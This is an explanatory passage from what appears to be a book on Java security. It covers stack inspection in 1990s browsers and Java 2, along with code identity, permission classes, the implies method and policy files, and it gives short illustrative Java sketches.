Java implements such a system by allowing security-checking code to examine the runtime stack for frames executing untrusted code. Each thread of execution has its own runtime stack (see Figure 3.5). Security decisions can be made with reference to this information. This is called stack inspection [Wallach, et al., 1997]. All the major vendors have adopted stack inspection to meet the demand for more flexible security policies than those originally allowed under the old sandbox model. Stack inspection is used by Netscape Navigator 4.0, Microsoft Internet Explorer 4.0, and Sun Microsystems' Java 2. (Interestingly, Java is thus the most widespread use of stack inspection for security ever. You can think of it as a very big security-critical experiment.)
Figure 3.5 Each Java program thread includes a runtime stack that tracks method calls. The purpose of the stack is to keep track of which method calls which other method in order to be able to return to the appropriate program location when an invoked method has finished its work. The stack grows and shrinks during typical program operation. Java 2 inspects the stack in order to make access control decisions. In this example, each stack frame includes both a method call and a trust label (T for trusted, U for untrusted).
Simple Stack Inspection

Netscape 3.0's stack-inspection-based model (and every other black-and-white security model) is a simple access control system with two principals: system and untrusted. Just to keep things simple, the only privilege available is full. In this model, every stack frame is labeled with a principal (system if the frame is executing code that is part of the VM or the built-in libraries, and untrusted otherwise). Each stack frame also includes a flag that specifies whether privilege is full. A system class can set this flag, thus enabling its privilege. This need only be done when something dangerous must occur, something that not every piece of code should be allowed to do. Untrusted code is not allowed to set the flag. Whenever a stack frame completes its work, its flag (if it has one) disappears.

Every method about to do something potentially dangerous is forced to submit to a stack inspection. The stack inspection is used to decide whether the dangerous activity should be allowed. The stack inspection algorithm searches the frames on the caller's stack in sequence from the newest to the oldest. If the search encounters an untrusted stack frame (which, as we know, can never get a privilege flag), the search terminates, access is forbidden, and an exception is thrown. The search also terminates if a system stack frame with a privilege flag is encountered; in this case, access is allowed (see Figure 3.6).
Figure 3.6 Two examples of simple stack inspection. Each stack is made of frames with three parts: a privilege flag (where full privilege is denoted by an X), a principal entry (untrusted or system), and a method. In STACK A, an untrusted applet is attempting to use the url.open() method to access a file in the browser's cache. The VM makes a decision regarding whether to set the privilege flag (which it does) by looking at the parameters in the actual method invocation. Since the file in this case is a cache file, access is allowed. In short, a system-level method is doing something potentially dangerous on behalf of untrusted code. In STACK B, an untrusted applet is also attempting to use the url.open() method; however, in this case, the file argument is not a browser cache file but a normal file in the filesystem. Untrusted code is not allowed to do this, so the privilege flag is not set by the VM and access is denied.
Real Stack Inspection

The simple example of stack inspection just given is only powerful enough to implement black-and-white trust models. Code is either fully trusted (and granted full permission at the same level as the application) or untrusted (and allowed no permission to carry out dangerous operations). However, what we want is the ability to create a shades-of-gray trust model. How can we do that? It turns out that if we generalize the simple model we get what we need. The first step is to add the ability to have multiple principals. Then we need to have many more specific permissions than full. These two capabilities allow us to have a complex system in which different principals can have different degrees of permission in (and hence, access to) the system.

Research into stack inspection shows that four basic primitives are all that are required to implement a real stack inspection system. In particular, see Dan Wallach's Ph.D. thesis at Princeton and the paper Understanding Java Stack Inspection [Wallach and Felten, 1998]. Each of the major vendors uses different names for these primitives, but they all boil down to the same four essential operations (all explained more fully in the following discussions):
enablePrivilege()
disablePrivilege()
checkPrivilege()
revertPrivilege()
Some resources, such as the file system or network sockets, need to be protected from use (and possible abuse) by untrusted code. These resources are protected by permissions. Before code (trusted or otherwise) is allowed access to one of these resources, say, R, the system must make sure to call checkPrivilege(R). If you recall our discussion of the Security Manager from the previous chapter, you'll remember that the Java libraries are set up in such a way that dangerous operations must go through a Security Manager check before they can occur. As we said, the Java API provides all calls necessary to implement a virtual OS, thus making isolation of all required security checks possible within the API. When a dangerous call is made to the Java API, the Security Manager is queried by the code defining the base classes. The checkPrivilege() method is used to help make behind-the-scenes access control decisions in a very similar fashion. To achieve backwards compatibility, the Security Manager can be implemented using the four stack inspection primitives.

When code wants to make use of some resource R, it must first call enablePrivilege(R). When this method is invoked, a check of local policy occurs that determines whether the caller is permitted to use R. If the use is permitted, the current stack frame is annotated with an enabled-privilege(R) mark. This allows the code to use the resource normally. Permission to use the resource does not last forever; if it did, the system would not work. There are two ways in which the privilege annotation is discarded. One way is for the call to return; in this case, the annotation is discarded along with the stack frame. The second way is for the code to make an explicit call to revertPrivilege(R) or disablePrivilege(R). The disablePrivilege() call creates a stack annotation that can hide an earlier enabled privilege, while revertPrivilege() simply removes annotations from the current stack frame.

All three major Java vendors implement a very similar (and simple) stack inspection algorithm. A generalization of this algorithm, after Wallach, is shown in Listing 3.1 [Wallach and Felten, 1998]. The algorithm searches stack frames on the caller's stack in order from newest to oldest. If the search finds a stack frame with the appropriate enabled-privilege annotation, it terminates, allowing access. If the search finds a stack frame that is forbidden from accessing the target by local policy, or that has explicitly disabled its privileges, the search terminates, forbidding access.

It may seem strange that the vendors take different actions when the search reaches the end of the stack without meeting any of the conditions (sometimes called falling off the end of the stack). Netscape denies permission, while both Microsoft and Sun allow permission. This difference has to do with backward compatibility. The Netscape choice causes legacy code to be treated like an old-fashioned applet, and confined to the sandbox. The Microsoft/Sun choice allows a signed Java application to use its privileges even without explicitly marking its stack frames, thus making it easy to migrate existing applications. Since Netscape did not support applications, they felt no need to follow the Microsoft/Sun approach and instead chose the more conservative course of denying permission. For more implementation detail on the three vendors' different code signing schemes, see Appendix C.
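The following Java sketch paraphrases the generalized algorithm just described (the one shown as Listing 3.1). The Frame interface, the policy check, and all names are invented for illustration; none of the vendors exposes the algorithm under these names.

// A sketch of the generalized stack inspection algorithm; the types and
// the policy lookup are stand-ins, not a vendor API.
class StackInspectionSketch {
    interface Frame {
        String principal();                       // "system", "untrusted", a signer, ...
        boolean enabledPrivilege(String target);
        boolean disabledPrivilege(String target);
    }

    // Does local policy forbid this principal from touching the target at all?
    static boolean policyForbids(String principal, String target) {
        return principal.equals("untrusted");     // stand-in for a real policy lookup
    }

    static boolean checkPrivilege(String target, Frame[] callStack, boolean vendorDefault) {
        // Search stack frames from newest to oldest.
        for (int i = 0; i < callStack.length; i++) {
            Frame f = callStack[i];
            if (policyForbids(f.principal(), target) || f.disabledPrivilege(target)) {
                return false;                      // access forbidden
            }
            if (f.enabledPrivilege(target)) {
                return true;                       // access allowed
            }
        }
        // "Falling off the end of the stack": Netscape denies access here,
        // while Microsoft and Sun allow it (for backward compatibility).
        return vendorDefault;
    }
}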
Formalizing Stack Inspection

Members of Princeton's Secure Internet Programming team (in particular, Dan Wallach and Edward Felten) have created a formal model of Java's stack inspection system in a belief logic known as ABLP (designed by Abadi, Burrows, Lampson, and Plotkin) [Abadi, et al., 1993]. Using the model, the Princeton team demonstrates how Java's access control decisions correspond to proving statements in ABLP. Besides putting Java's stack inspection system on solid theoretical footing, the work demonstrates a very efficient way to implement stack inspection systems as pushdown automata using security-passing style. Interested readers should see [Wallach and Felten, 1998], which is available through the Princeton Web site at cs.princeton.edu/sip/pub/oakland98.html. A more recent paper on how to implement stack inspection more efficiently is also available on the Princeton site.
Section 7 -- New Security Mechanisms in Sun's Java 2
Now that we have covered the basic concepts and the underlying mechanisms of Java 2 security, we can delve into the details of the system. Essential mechanisms include many of the things we have already discussed: identity, permissions, implies, policy, protection domains, access control, and privilege. Sources for the information presented here include [Gong, et al., 1997; Gong and Schemers, 1998].

This section describes Sun's version of stack inspection. Netscape and Microsoft each have their own version, but we decided to forgo a lengthy discussion of all three systems. Though the vendors claim they are very different, we think the three systems are really quite similar. Perhaps one day they will all converge, making developers' and managers' lives much easier.
Identity

Every piece of code needs a specific identity that serves as a basis for security decisions. In Java 2, each piece of code has two identity-defining characteristics: origin and signature. These two characteristics are represented in the class java.security.CodeSource, which allows the use of wildcard entries to denote "anywhere" for origin and "unsigned" for signature.

Origin boils down to the location the code came from, specified as a URL. This is the same sort of identity used to separate applets in the JDK 1.0.2 class loading scheme. In fact, Java 2 identity is really an extension of that idea.

Signature is a bit more complicated. Remember, public/private keys come in pairs. As we know, code can be digitally signed by a person or organization who vouches for it. The key used to actually sign the code is the signer's private key. The key used to check the signature for validity is the signer's public key. So, the public key corresponding to the private key used to sign a piece of code is the second identity characteristic. (In practice, implementations actually use an alias for the public key corresponding to the private key used to sign the code.) Many people say that a signature on code tells you "who wrote the code" or "where the code came from" (we've been guilty of this faux pas ourselves in days gone by), but this is not true. All a signature tells you is who signed the code. The author, distributor, and signer of the code may all be different parties. All you know for sure is that the signer vouches for the code. And since it makes perfect sense for several people to vouch for the same piece of code, a good signature scheme ought to allow a piece of code to carry several signatures; then each recipient can decide which of the signers (if any) should be trusted.
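A small sketch of how the two identity characteristics come together in a CodeSource object; the URL is illustrative, and passing null for the certificate array stands in for unsigned code.

import java.net.URL;
import java.security.CodeSource;
import java.security.cert.Certificate;

public class CodeSourceSketch {
    public static void main(String[] args) throws Exception {
        // Identity = where the code came from + who signed it (here: nobody).
        CodeSource cs = new CodeSource(new URL("http://www.rstcorp.com/"),
                                       (Certificate[]) null);
        System.out.println(cs);
    }
}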
Permissions

Requests to perform a particular operation (most notably a dangerous one) can be encapsulated as a permission. A policy says which permissions are granted to which principals. The abstract class java.security.Permission types and parameterizes a set of access permissions granted to classes. Permissions can be subclassed from this class (and its subclasses). Good practice dictates that a permission class should belong to the package in which it is used. Java 2 defines access methods and parameters for many of the resources controlled by the VM. Permissions include:

java.io.FilePermission for file system access
java.net.SocketPermission for network access
java.lang.PropertyPermission for Java properties
java.lang.RuntimePermission for access to runtime system resources
java.security.NetPermission for authentication
java.awt.AWTPermission for access to graphical resources such as windows

Permissions usually include a target and an action. For file access, a target can be a file or a directory specified as file, directory, directory/file, directory/*, or directory/-. The * denotes all files in the specified directory. The - denotes all files under the associated file system subtree (meaning that all by itself, - denotes all files in the entire system). Actions for file access include read, write, execute, and delete. An example of a file permission is:

p = new FilePermission("/applets/tmp/scratch", "read");

For network access, a target can be an IP address, a hostname, or a generalized set of hostnames, plus a range of port numbers. The target argument takes the form "hostname:port-range". Actions for network access include connect, listen, and accept. An example of a socket permission is:

p = new SocketPermission("bigbrother.rstcorp.com:-1023", "connect");

For getting and setting properties, a target is the property (where * denotes all properties). Actions are get and set. Runtime system resource targets include createClassLoader, exit, setFactory, thread, multicast, fileDescriptor.read, fileDescriptor.write, and so on. AWT permission targets include topLevelWindow, systemClipboard, and eventQueue. Fully trusted Java applications can add new categories of permissions.
Implies

Each Permission class must include the abstract method implies. The idea is straightforward: having one permission, x, may automatically imply having another permission, y. We denote this x.implies(y) == true in code. A permission x implies another permission y if and only if both the target of x implies the target of y and the action of x implies the action of y. Consider the permission "read file /applets/tmp/scratch," which can be written as:

p = new FilePermission("/applets/tmp/scratch", "read");

A permission allowing a read on any file in /applets/tmp (that is, a permission denoted by the pair (/applets/tmp/*, read)) implies our example permission p, but not vice versa. Similarly, a given socket permission s implies another socket permission t if and only if t covers the same IP address and port numbers for the same set of actions.

Alert readers might have noticed something funny about the implies method: Each permission class says which other permissions it implies. This is a bit like Johnny writing himself a note saying he can drive Dad's car. It seems safer to require Dad's signature on the note. Similarly, it would be safer if permission for A to imply B had to be granted by B.
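A quick demonstration of the implies relationship for file permissions, using the same targets discussed above (the class name is invented):

import java.io.FilePermission;

public class ImpliesSketch {
    public static void main(String[] args) {
        FilePermission anyTmpFile = new FilePermission("/applets/tmp/*", "read");
        FilePermission scratch = new FilePermission("/applets/tmp/scratch", "read");

        System.out.println(anyTmpFile.implies(scratch));   // true
        System.out.println(scratch.implies(anyTmpFile));   // false: not vice versa
    }
}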
Policy

Security policy in Java 2 can be set by a user (which is a bad idea since, as we know, users like dancing pigs) or by a system administrator (which, in a Catch-22-like situation, is also a bad idea since system administrators are severely overworked). The policy is represented by a policy object instantiated from the class java.security.Policy. The policy is a mapping from identity (as defined earlier) to a set of access permissions granted to the code. The policy object is a runtime representation of policy, usually set up by the VM at startup time (much like the Security Manager). An example policy (in plaintext form) is shown here:

grant CodeBase "https://www.rstcorp.com/users/gem", SignedBy "*" {
    permission java.io.FilePermission "/applets/tmp/*", "read,write";
    permission java.net.SocketPermission "*.rstcorp.com", "connect";
};
This policy states that any applet that arrives from the Web URL "www.rstcorp.com/users/gem", whether signed or unsigned, can read and write any file in the directory /applets/tmp as well as make a socket connection to any host in the domain rstcorp.com. Policies are usually made up of many grant clauses.

In practice, policy is set in a plaintext configuration file and is loaded into the VM at startup. In these policies, a public key (usually a very long string of bits) is signified by an alias. The alias is the name of a signer represented as a string. For example, a popular alias is the string "self", meaning your own private key. Primitive mechanisms are included to create and import public keys and certificates into the Java 2 system. (See Appendix C for the details.)

By default, Sun's VM expects to find a system policy in the file <java.home>/lib/security/java.policy (where <java.home> is a configurable Java property). This policy can be extended on a per-user basis. User policy files can be found in a user's home directory in the file .java.policy. The VM loads the system policy at startup and then loads any relevant user's policy. If neither policy can be found, a built-in default is used. The built-in default policy implements the base Java sandbox model.

It is possible to specify a particular policy to use when invoking an application. This is carried out by using the Java-property-defining -D flag as follows (for the example, our application is the appletviewer):

appletviewer -Djava.security.policy=/home/users/gem/policy
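For completeness, here is a hedged sketch of how code that has been granted a permission by policy actually exercises it in Sun's implementation: the dangerous operation is wrapped in AccessController.doPrivileged, which plays roughly the role of the enablePrivilege primitive discussed earlier. The file path is the one from the example policy; the class name is invented.

import java.io.FileReader;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class PrivilegedSketch {
    // Assumes the running code's protection domain has been granted
    // FilePermission for /applets/tmp/* by the policy shown above.
    static FileReader openScratch() throws Exception {
        return (FileReader) AccessController.doPrivileged(
            new PrivilegedExceptionAction() {
                public Object run() throws Exception {
                    return new FileReader("/applets/tmp/scratch");
                }
            });
    }
}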